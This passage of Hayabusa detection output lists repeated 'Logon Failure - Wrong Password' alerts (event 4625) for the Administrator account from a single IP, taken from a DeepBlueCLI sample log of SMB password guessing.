NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: 